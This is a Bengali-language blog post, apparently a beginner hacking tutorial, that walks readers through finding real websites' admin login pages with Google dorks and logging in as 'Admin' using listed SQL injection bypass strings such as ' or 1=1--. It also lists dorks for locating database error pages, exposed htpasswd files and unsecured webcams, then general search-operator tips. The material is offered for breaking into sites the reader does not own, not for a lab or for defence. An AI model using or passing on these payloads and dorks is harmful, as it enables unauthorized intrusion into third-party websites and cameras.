হ্যাকিং - sql injection

কথা না বাড়িয়ে প্রথমেই নিচের নিয়ম
গুলো ফলো করুনঃ প্রথমে আমরা যাব http://www.google.com এ। এবার Search বক্সে যে কোন একটি Google dork
লিখুন।
আপনাদের সুবিধার্থে আমি sql injection কিছু
দিয়ে দিলাম নিচে।
"inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" "inurl: admin.php" "inurl: login/admin.php" "inurl: admin/login.php" "inurl: adminlogin.php" "inurl: adminhome.php" "inurl: admin_login.php" "inurl: administratorlogin.php" "inurl: login/administrator.php" "inurl: administrator_login.php" এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল
পাবেন।
যে কোন একটি সাইটে প্রবেশ করুন।
তাহলে সাইটটি আপনাকে নিচের মতো কিছু
দেখাবে…
welcome to xxxxxxxxxx administrator panel username : password : এখানে ইউজার নেম দিনঃ “Admin”
তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও
নাই
নিচে কিছু sql injections দিলাম। এখান
থেকে যে কোন একটি দিন।
\' or \'1\''1 \' or \'x\''x \' or 0=0 -- " or 0=0 -- or 0=0 -- \' or 0=0 # " or 0=0 # or 0=0 # \' or \'x\''x " or "x"="x \') or (\'x\''x \' or 1=1-- " or 1=1-- or 1=1-- \' or a=a-- " or "a"="a \') or (\'a\''a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi\' or 1=1 -- \'or\'1=1\' username:Admin password:\'or\'1\''1 More Dorks : “Incorrect syntax near”
“Incorrect syntax near”
“Internal Server Error” “server at”
“Invision Power Board Database Error”
“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“Parse error: parse error, unexpected
T_VARIABLE” “on line” filetype:php
“PostgreSQL query failed: ERROR: parser: parse
error”
“Supplied argument is not a valid MySQL result resource”
“Syntax error in query expression ” -the
“The s?ri?t whose uid is ” “is not allowed to
access”
“There seems to have been a problem with the” ”
Please try again by clicking the Refresh button in your web browser.”
“Unable to jump to row” “on MySQL result index”
“on line”
“Unclosed quotation mark before the character
string”
“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
“Warning: Cannot modify header information –
headers already sent”
“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user:
‘*@*” “on line” -help -forum “Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to
PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-
Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.”
“The s?ri?t whose uid is” “is not allowed to
access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect
syntax near” An unexpected token “END-OF-STATEMENT”
was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL”
filetype:asp “Custom Error Message” Category
Source filetype:log “PHP Parse error” | “PHP Warning” |
“PHP Error”
filetype:php inurl:”logging.php” “Discuz” error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages Internal Server Error
intext:”Error Message : Error loading required
libraries.”
intext:”Warning: Failed opening” “on line”
“include_path”
intitle:”Apache Tomcat” “Error Report” intitle:”Default PLESK Page”
intitle:”Error Occurred While Proces
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd inurl:yapboz_detay.asp + View Webcam User
Accessing
allinurl:control/multiview
inurl:”ViewerFrame?Mode=”
intitle:”WJ-NT104 Main Page”
inurl:netw_tcp.shtml intitle:”supervisioncam protocol”
Some More Info : এখন মনে করুন আপনি গুগলে কিছু সার্চ করবেন
বা খুজবেন। ধরি আপনি কোন ফোরাম খুজবেন।
সেটা হতে পারে হ্যাকিং ফোরাম। তাহলে গুগলের
সার্চ বক্সে লিখুন inurl:forum অর্থাৎ আপনার টপিক যা ই হোক না কেন
আপনি সেটাই লিখে সার্চ দিতে পারেন। inurl:আপনার কাঙ্খিত বিষয়বস্তু আপনি যদি text বা কোন লেখা বা কোন
শব্দকে টপিক হিসেবে ধরে সার্চ দিতে চান
তাহলে লিখুন Intext:আপনার কাঙ্খিত বিষয়বস্তু আমি জানি আপনারা অনেকেই এসব
বিষয়ে একেবারে সিদ্ধহস্ত। কিন্তু
আমি লিখছি আমার মত নতুনদের জন্য। আর
একটা জিনিস তা হচ্ছে, আপনাকে এসইও
বুঝতে হবে, তা না হলে কোন ওয়েবসাইট
হ্যাকিংয়ের সময় এসকিউএল ইন্জেকশন এর ক্ষেত্রে, ইন্টারনেটে এসব খোঁজার
ক্ষেত্রে আপনাকে অনেক ঝামেলায় পড়তে হবে।
আশা করি বুঝতে পারছেন এসইও কেন গুরুত্বপূর্ণ। এখন নিচে আমি যা লিখছি সেগুলো একটু
অধ্যায়ন করুন। অবশ্যই ইন্টারনেটে। মনে করুন আপনি Hacking Technique এই
বিষয়ে কিছু খুঁজতে চান। তাহলে গুগলে লিখুন intitle:hacking technique যদি আপনি কোন ওয়েবসাইটের লগইন পেস
খুঁজতে চান তাহলে লিখুন intext:login inurl:website address এখন যদি আপনি কোন নির্দিষ্ট ওয়েবসাইটের
কোন তথ্য খুঁজতে চান তাহলে লিখুন site:ওয়েবসাইটের সম্পূর্ন URL
এবং আপনি যে তথ্যটি চান তা লিখুন এখন যদি আপনি কোন pdf ফাইল
খুজেঁ দেখতে চান তাহলে লিখুন Filetype:pdf আপনার ফাইলের বিষয় উপরে pdf এর জায়গায় আপনি doc, xls, csv
ইত্যাদিও লিখতে পারেন।

পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon

:)
:(
=(
^_^
:D
=D
=)D
|o|
@@,
;)
:-bd
:-d
:p
:ng
:lv
Thanks for your comment